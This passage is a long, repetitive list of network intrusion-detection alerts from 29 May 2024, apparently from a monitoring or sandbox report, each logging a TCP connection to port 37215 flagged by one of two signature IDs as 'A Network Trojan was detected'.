                SID:2835222
                Source Port:50376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611498
                SID:2829579
                Source Port:35962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571494
                SID:2829579
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790793
                SID:2835222
                Source Port:59956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034703
                SID:2829579
                Source Port:41494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966607
                SID:2835222
                Source Port:56872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625289
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629055
                SID:2829579
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725385
                SID:2829579
                Source Port:60724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007523
                SID:2835222
                Source Port:40292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667875
                SID:2835222
                Source Port:60240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336564
                SID:2829579
                Source Port:33650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716359
                SID:2829579
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470189
                SID:2829579
                Source Port:52408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856286
                SID:2829579
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450825
                SID:2829579
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166069
                SID:2835222
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094890
                SID:2829579
                Source Port:49258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225552
                SID:2829579
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223902
                SID:2829579
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022236
                SID:2829579
                Source Port:60026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965694
                SID:2835222
                Source Port:56592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445412
                SID:2835222
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555553
                SID:2829579
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841338
                SID:2835222
                Source Port:55098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421047
                SID:2835222
                Source Port:58440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819603
                SID:2835222
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022145
                SID:2835222
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273949
                SID:2829579
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657654
                SID:2835222
                Source Port:51590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688198
                SID:2829579
                Source Port:48764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038416
                SID:2835222
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651858
                SID:2829579
                Source Port:45808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622980
                SID:2835222
                Source Port:37680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843188
                SID:2829579
                Source Port:53880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985614
                SID:2835222
                Source Port:47930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652241
                SID:2835222
                Source Port:49884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335379
                SID:2829579
                Source Port:33520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415002
                SID:2829579
                Source Port:58382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967407
                SID:2835222
                Source Port:33036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381271
                SID:2835222
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943104
                SID:2829579
                Source Port:51282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780636
                SID:2829579
                Source Port:36858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856194
                SID:2829579
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665622
                SID:2829579
                Source Port:36484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429667
                SID:2835222
                Source Port:47996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655662
                SID:2835222
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834453
                SID:2829579
                Source Port:56378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654121
                SID:2829579
                Source Port:44850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959542
                SID:2835222
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461492
                SID:2835222
                Source Port:45540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915529
                SID:2829579
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615167
                SID:2829579
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572752
                SID:2829579
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899861
                SID:2835222
                Source Port:54700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948357
                SID:2835222
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728546
                SID:2835222
                Source Port:43654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072269
                SID:2835222
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969925
                SID:2835222
                Source Port:33876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620685
                SID:2829579
                Source Port:40908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663589
                SID:2835222
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983411
                SID:2829579
                Source Port:54058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043882
                SID:2829579
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276798
                SID:2829579
                Source Port:48566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365825
                SID:2835222
                Source Port:47074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564958
                SID:2829579
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927727
                SID:2829579
                Source Port:49364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780806
                SID:2829579
                Source Port:60802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786303
                SID:2829579
                Source Port:48790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236130
                SID:2829579
                Source Port:51122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042778
                SID:2829579
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654500
                SID:2829579
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812939
                SID:2829579
                Source Port:46380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898169
                SID:2829579
                Source Port:57654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164776
                SID:2835222
                Source Port:47098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135429
                SID:2829579
                Source Port:47496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360646
                SID:2829579
                Source Port:43198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010072
                SID:2829579
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951016
                SID:2835222
                Source Port:33336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417238
                SID:2835222
                Source Port:43390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685135
                SID:2829579
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421394
                SID:2835222
                Source Port:60552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551466
                SID:2829579
                Source Port:35740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225882
                SID:2835222
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669294
                SID:2829579
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849340
                SID:2835222
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667852
                SID:2829579
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899659
                SID:2835222
                Source Port:55682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948115
                SID:2835222
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165026
                SID:2829579
                Source Port:44920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071287
                SID:2835222
                Source Port:38612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263857
                SID:2829579
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076539
                SID:2835222
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140849
                SID:2829579
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870225
                SID:2829579
                Source Port:45896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584050
                SID:2835222
                Source Port:32880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371416
                SID:2835222
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686842
                SID:2829579
                Source Port:37654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855967
                SID:2835222
                Source Port:49250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778021
                SID:2835222
                Source Port:48554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176680
                SID:2829579
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464651
                SID:2835222
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929689
                SID:2835222
                Source Port:42262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858926
                SID:2835222
                Source Port:34762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817336
                SID:2835222
                Source Port:58848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281774
                SID:2835222
                Source Port:58948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871656
                SID:2829579
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584503
                SID:2835222
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083667
                SID:2829579
                Source Port:39108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175708
                SID:2829579
                Source Port:50974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025094
                SID:2835222
                Source Port:46640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560773
                SID:2829579
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681891
                SID:2835222
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975285
                SID:2835222
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288093
                SID:2829579
                Source Port:33066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628490
                SID:2829579
                Source Port:36976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559346
                SID:2829579
                Source Port:33562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672771
                SID:2829579
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236048
                SID:2835222
                Source Port:39412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2835222
                Source Port:42954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675081
                SID:2835222
                Source Port:43952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223455
                SID:2829579
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571510
                SID:2829579
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732042
                SID:2835222
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037063
                SID:2829579
                Source Port:58276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044240
                SID:2835222
                Source Port:36098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787615
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956356
                SID:2829579
                Source Port:51040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958122
                SID:2829579
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149259
                SID:2829579
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331378
                SID:2835222
                Source Port:36622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983203
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448223
                SID:2835222
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668209
                SID:2835222
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861811
                SID:2829579
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763304
                SID:2835222
                Source Port:59938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119360
                SID:2829579
                Source Port:40536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864491
                SID:2835222
                Source Port:33158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325130
                SID:2829579
                Source Port:56766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232181
                SID:2835222
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805908
                SID:2829579
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859342
                SID:2835222
                Source Port:33646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087310
                SID:2835222
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276777
                SID:2829579
                Source Port:33482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734871
                SID:2829579
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226062
                SID:2835222
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504839
                SID:2829579
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981644
                SID:2835222
                Source Port:54862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808494
                SID:2835222
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140756
                SID:2829579
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984775
                SID:2835222
                Source Port:49446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070412
                SID:2835222
                Source Port:46182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947254
                SID:2835222
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652961
                SID:2829579
                Source Port:43078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001018
                SID:2829579
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398673
                SID:2829579
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465336
                SID:2829579
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528564
                SID:2829579
                Source Port:46776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556216
                SID:2829579
                Source Port:36226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620765
                SID:2829579
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968355
                SID:2835222
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869599
                SID:2835222
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364120
                SID:2835222
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668213
                SID:2829579
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852199
                SID:2835222
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514115
                SID:2835222
                Source Port:55570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848744
                SID:2829579
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025317
                SID:2835222
                Source Port:59866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518933
                SID:2835222
                Source Port:40396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868785
                SID:2829579
                Source Port:48630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950201
                SID:2829579
                Source Port:50226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319645
                SID:2829579
                Source Port:59328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883769
                SID:2829579
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160996
                SID:2835222
                Source Port:47916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025015
                SID:2829579
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971463
                SID:2829579
                Source Port:59094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862721
                SID:2829579
                Source Port:56274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507396
                SID:2829579
                Source Port:54846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854700
                SID:2829579
                Source Port:53432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128879
                SID:2835222
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174989
                SID:2829579
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868793
                SID:2835222
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189735
                SID:2829579
                Source Port:36626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839702
                SID:2835222
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965148
                SID:2829579
                Source Port:57228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040638
                SID:2829579
                Source Port:46044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597493
                SID:2835222
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325550
                SID:2829579
                Source Port:32890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009465
                SID:2835222
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336256
                SID:2835222
                Source Port:52500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422463
                SID:2829579
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786899
                SID:2829579
                Source Port:35252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826264
                SID:2835222
                Source Port:48988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911092
                SID:2835222
                Source Port:37944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870182
                SID:2835222
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909820
                SID:2829579
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133970
                SID:2829579
                Source Port:34856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935584
                SID:2829579
                Source Port:40156
                Destination Port:37215
